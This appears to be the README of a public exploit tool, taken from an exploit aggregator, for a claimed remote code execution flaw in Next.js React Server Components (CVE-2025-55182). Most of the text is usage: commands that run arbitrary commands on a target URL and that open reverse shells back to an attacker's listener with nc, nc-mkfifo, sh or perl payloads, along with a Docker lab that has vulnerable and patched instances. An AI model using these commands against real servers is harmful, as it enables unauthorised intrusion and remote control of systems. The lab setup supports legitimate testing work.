Share
## https://sploitus.com/exploit?id=4967CC14-FD31-5DAA-9346-7EA75D47DD43
# Next.js React Server Components RCE Exploit

Exploits CVE-2025-55182 for remote code execution via prototype pollution.

## Installation

```bash
uv sync
```

## Usage

### Command Execution

```bash
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"
```

### Reverse Shell

```bash
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo
```

### Options

- `-u, --url`: URL/host to check (required)
- `-c, --cmd`: Command to execute
- `-r, --reverse`: Enable reverse shell mode
- `-l, --lhost`: Listener host for reverse shell
- `-p, --lport`: Listener port for reverse shell
- `-P, --payload`: Reverse shell payload type: `nc`, `nc-mkfifo`, `sh`, `perl` (default: `nc`)
- `--timeout`: Request timeout in seconds (default: 10)

## Examples

```bash
# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
```

## Lab Environment

The `lab/` directory contains a complete Docker setup for testing the exploit.

### Setup

```bash
cd lab
docker-compose up -d
```

This will start two services:
- **vulnerable**: Vulnerable Next.js application on port 3011
- **patched**: Patched Next.js application on port 3012

### Testing

```bash
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
```